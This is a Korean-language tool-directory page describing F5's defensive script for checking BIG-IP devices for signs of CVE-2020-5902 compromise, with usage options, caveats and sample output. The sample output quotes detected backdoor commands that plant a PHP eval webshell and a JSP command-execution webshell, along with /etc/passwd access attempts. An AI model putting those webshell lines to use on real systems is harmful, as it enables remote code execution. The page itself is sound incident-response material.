Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2020-5902-ioc-bigip-checker — CVE-2020-5902와 관련된 침해 지표(IoCs)를 스캔하고, 로그, 파일, 시스템 무결성을 확인하여 익스플로잇 후 활동을 탐지하는 로컬 F5 BIG-IP 스크립트입니다. | Kitploit
도구/GitHubGitHub/f5devcentral/cve-2020-5902-ioc-bigip-checker
Indicator of Compromise (IOC) ManagementVulnerability AnalysisForensicsWeb SecurityIncident ResponseLog Analysis
GitHubf5devcentral/cve-2020-5902-ioc-bigip-checker

cve-2020-5902-ioc-bigip-checker

CVE-2020-5902와 관련된 침해 지표(IoCs)를 스캔하고, 로그, 파일, 시스템 무결성을 확인하여 익스플로잇 후 활동을 탐지하는 로컬 F5 BIG-IP 스크립트입니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
171236년 전아직 검토되지 않음

CVE-2020-5902 IoC 탐지 도구

이 스크립트는 root 권한을 가진 사용자가 F5 BIG-IP의 Advanced Shell(bash)에서 로컬로 실행하도록 설계되었으며, 다른 환경에서 실행하기 위한 것이 아닙니다. 참고: Appliance Mode에서는 Advanced Shell에 접근할 수 없으므로 이 도구는 해당 시스템에서 실행할 수 없습니다.

이 스크립트는 작성 당시 F5 Networks에 알려진 CVE-2020-5902와 관련된 침해 지표(IoCs)에 대해 BIG-IP를 검사합니다. 스크립트는 이러한 IoC를 수집하여 최선의 진행 방향을 결정하는 데 사용할 수 있는 개요 보고서를 제공합니다. 이 도구가 IoC를 발견하면 수동으로 검사하고 확인한 다음, 의심되는 손상 시스템 처리에 대한 문서화된 절차를 따르십시오. F5 관련 지침은 K11438344: BIG-IP 시스템 보안 침해가 의심될 때 고려 사항 및 지침에서 확인할 수 있습니다.

참고: 시스템 무결성에 대해 확신이 없거나 의심이 드는 경우, 신중한 접근 방식은 시스템이 손상된 것으로 간주하고 손상된 시스템 처리를 위한 내부 절차를 따르는 것입니다. 또한 손상된 시스템에 포함된 모든 정보는 그 자체로 손상된 것으로 간주되어야 합니다. 여기에는 비밀번호, 개인 키, 디지털 인증서, 구성, 로그 등이 포함되나 이에 국한되지 않습니다.

제한 사항 및 고려 사항

IoC는 시간 경과(예: 로그 로테이션 일정) 또는 충분히 숙련된 공격자에 의한 제거로 인해 더 이상 존재하지 않을 수 있습니다. CVE-2020-5902 악용은 잠재적으로 root 사용자로 원격 코드 실행을 초래하므로, 숙련된 공격자는 악용 후 시스템에서 흔적을 자유롭게 제거할 수 있습니다.

또한 공격자는 python을 포함한 시스템의 모든 바이너리를 오염시킬 수 있습니다. 이러한 가능성을 피하기 위해 합리적인 조치가 취해졌습니다. 그러나 의심되는 시스템에서 이 도구의 출력에 대한 신뢰 수준은 사용자가 결정해야 합니다.

sys-eicheck를 포함하는 BIG-IP 버전(13.1.0부터)에서는 이 도구가 관리자에게 실행 중인 시스템을 원래 설치 RPM과 비교하여 이 도구가 의존하는 시스템 명령의 무결성을 확인할 수 있는 기회를 제공합니다. sys-eicheck는 FIPS 기능에 관계없이 모든 플랫폼에서 실행할 수 있습니다.

이전 버전에서는 이 도구에 현재 이 기능이 포함되어 있지 않으며, 원래 설치된 시스템 바이너리의 변조 여부를 확인하지 않고 실행됩니다.

이 스크립트의 진위 확인

이 버전의 CVE-2020-5902_bigip_ioc_checker.py에 대한 sha384 합계는 다음과 같습니다: ce674235744b54de3331c19a402f911c4390dbbf297643ec3eed165bda49a951f48c1be9188372de3d92dd9f28595cbb

이 파일은 F5 DevCentral GitHub 저장소에서만 다운로드해야 합니다.

CVE-2020-5902 정보

CVE-2020-5902에 대한 정보의 공식 출처는 항상 F5 보안 권고 K52145254: TMUI RCE 취약점 CVE-2020-5902입니다.

스크립트 실행

파일 CVE-2020-5902_bigip_ioc_checker.py를 대상 BIG-IP에 다운로드하고 BIG-IP에 이미 설치된 python을 사용하여 실행하기만 하면 됩니다.

예:

root@kitploit:~
[root@hostname:Active:Standalone] tmp # python CVE-2020-5902_bigip_ioc_checker.py -h
USAGE: python CVE-2020-5902_bigip_ioc_checker.py

You can use the following options <-iajylcbwut> to skip some checks:

Option: -i or --skip_sys-eicheck
[+] Skip using the sys_eicheck utility to scan the BIG-IP system for any unexpected changes to the system software.
[+] Please refer to https://support.f5.com/csp/article/K00029945for more details about the sys-eicheck utility.
[+] The sys-eicheck utility may take several minutes to finish.

Option: -a or --skip_audit_check        [+] Skip scanning the audit log for malicious activities.
Option: -j or --skip_journal_check      [+] Skip scanning the journal log for malicious activities.
Option: -y or --skip_systems_check      [+] Skip scanning /config/bigip_user.conf to look for malicious users.
Option: -l or --skip_alias_check        [+] Skip scanning /config/bigip_*.conf for malicious alias definition.
Option: -c or --skip_catalina_check     [+] Skip scanning the tomcat catalina.out log for malicious activities.
Option: -b or --skip_bigipstartup_check [+] Skip checking if /config/startup contains blacklisted words.
Option: -w or --skip_webshell_check     [+] Skip checking Files created after 2020 Jun 29 in the /usr/local/www/ to look for possible webshell files.
Option: -u or --skip_autostart_check    [+] Skip checking Files created after 2020 Jun 29 in /etc/ to look for the possible autostart script.
Option: -t or --skip_tmp_check          [+] Skip checking Files created after 2020 Jun 29 in /tmp
Option: -p or --disable_color_print     [+] Disable color print, better for saving result
Option: -q or --bigiq_cmd_check         [+] Run BIG-IQ compatible malicious command check

Option: -h or --help                    [+] Print usage

알려진 문제

BIG-IP가 BIG-IQ 또는 다른 자동화/관리 시스템에 의해 관리되는 경우, BIG-IQ 또는 다른 자동화/관리 시스템으로부터 bash 명령을 수신할 수 있습니다. 일부 bash 명령에는 base64 인코딩 스크립트가 포함되어 있습니다. BIG-IP 감사 로그에 기록된 이러한 bash 명령은 IoC 탐지 도구가 "!! IoC 패턴 악성 bash 명령 발견" 오탐을 보고하도록 할 수 있습니다. 오탐을 줄이기 위해 -q 옵션을 사용하여 IoC 탐지 도구가 감사 로그에서 합법적인 base64 인코딩 스크립트를 무시하도록 할 수 있습니다.

시스템 업그레이드는 /usr/local/www/의 파일 타임스탬프를 업데이트하여 오탐을 초래할 수 있습니다. 예를 들어, 수정된 소프트웨어가 최근에 설치된 경우입니다.

/usr/local/www/, /etc/, /tmp/에서 파일 생성 날짜 확인 결과가 반환되면 해당 파일의 적법성을 확인하기 위해 검사해야 합니다.

수정된 버전으로 업그레이드하거나 해결 방법을 적용한 후에도 journalctl 로그에서 침해 지표를 여전히 찾을 수 있습니다. 로그가 있는 경우 타임스탬프를 검토하여 업그레이드 또는 해결 방법 적용 전에 발생했는지 확인하십시오.

샘플 출력

root@kitploit:~
# python CVE-2020-5902_bigip_ioc_checker.py -iqa
>>>> Skip sys-eicheck check
>>>> Run BIG-IQ compatible malicious command check
>>>> Skip audit log check
CVE-2020-5902 Indicators of Compromise checker. False positive reports are possible and all results should be manually verified.
[+] Version 13.1.0 Build 0.0.1868 CVE-2020-5902 Fixed: False
!! IoC pattern ['/etc/fakefile', '/etc/passwd', '/etc/fakefile1'] access denied in file /var/log/tomcat/catalina.out
!! IoC pattern ['/config/bigip_base.conf'] access denied in file /var/log/tomcat/catalina.out.1
!! IoC pattern Possible backdoor echo "<?php eval(\$_REQUEST[09ede7]);" > /usr/local/www/xui/common/css/webshell.php in file /config/startup
!! IoC pattern Possible backdoor echo "Runtime.getRuntime().exec("cmd.exe /C " + cmd);" > /usr/local/www/xui/common/css/webshell.jsp in file /config/startup

[+]==========================  auto start script checking  ==========================
!! Files created in /etc/ after 2020 Jun 29, need to check if those are malicious daemon startup script
 95291    1 -rw-r--r--   1 root     root            0 Jul 20 14:49 /etc/rc.d/init.d/autostartbackdoor
104847    4 -rw-------   1 root     root          199 Jul 13 10:46 /var/spool/cron/root


[+]================================  /tmp/ checking  ================================
!! File /tmp/backdoor_curl could be a malicous script
!! File /tmp/CVE-2020-5902_bigip_ioc_checker.py could be a malicous script
!! Files created in /tmp/ after 2020 Jun 29, need to check if those are malicious scripts
 18491   40 -rw-r--r--   1 root     root        38066 Jul 20 14:57 /tmp/CVE-2020-5902_bigip_ioc_checker.py
 18497    1 -rw-r--r--   1 root     root            0 Jul 20 14:49 /tmp/backdoor_new


[+]==============================  webshell checking  ==============================
!! Files created in /usr/local/www/ after 2020 Jun 29, need to check if those are webshell or information leakage
243368    4 -rw-r--r--   1 root     root           33 Jul 20 14:49 /usr/local/www/xui/common/css/webshell.php
243367    4 -rw-r--r--   1 root     root           33 Jul 17 08:30 /usr/local/www/xui/common/css/css.php
243369    4 -rw-r--r--   1 root     root           46 Jul 20 14:49 /usr/local/www/xui/common/css/webshell.jsp
EULA, 보증 및 라이선스

F5는 CVE-2020-5902 IoC 탐지 도구를 제공하여 고객이 iHealth 외부에서 CVE-2020-5902와 관련된 특정 침해 지표에 대해 F5 장치를 분석할 수 있도록 지원합니다. 단, 다음 사항에 유의하십시오.

  1. CVE-2020-5902 IoC 탐지 도구는 포괄적이지 않으며 그렇게 의도되지 않았습니다. 이 도구는 가능한 모든 침해 지표를 식별하는 것이 아니라, 손상된 F5 장치에 대한 내부 분석을 기반으로 F5가 일반적으로 신뢰할 수 있다고 판단한 선택된 그룹만 식별합니다.

  2. 모든 손상된 F5 장치가 동일한 지표를 보이는 것은 아니며, 공격자는 작업 흔적을 제거할 수 있습니다. 어떤 장치도 손상되지 않았음을 증명하는 것은 불가능합니다. 확신이 없는 경우 추가 분석이 필요하거나 보안 팀에 문의하는 것이 좋습니다.

  3. 사용자의 업무 운영에 불필요한 중단을 피하기 위해, CVE-2020-5902 IoC 탐지 도구는 피크 트래픽 시간에 작동하지 않아야 하며, 일반적으로 사용자의 정기 유지 관리 시간에 사용해야 합니다.

  4. 침해 지표가 확인되면 F5는 사용자가 문서화된 내부 사고 대응 절차를 따를 것을 권장합니다. F5는 BIG-IP 시스템의 보안 침해가 의심될 때 일반적인 고려 사항과 지침을 K11438344: BIG-IP 시스템 보안 침해가 의심될 때 고려 사항 및 지침으로 제공했습니다. 또한 사용자는 고객 지원 포털 또는 기타 표준 채널을 통해 F5에 직접 문의하여 추가 지원을 받을 수 있습니다.

CVE-2020-5902 IoC 탐지 도구는 F5 사용자의 편의를 위해 제공되며, Apache License 조건에 따라 "있는 그대로" 제공됩니다. 사용자는 CVE-2020-5902 IoC 탐지 도구를 사용함으로써 발생하는 모든 위험을 부담합니다.

Copyright © 2020 F5 Networks, Inc.

Licensed under the Apache License, Version 2.0 (the "License"); you may not use the CVE-2020-5902 IoC Detection Tool except in compliance with the License. You may obtain a copy of the License at:

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

도구 다운로드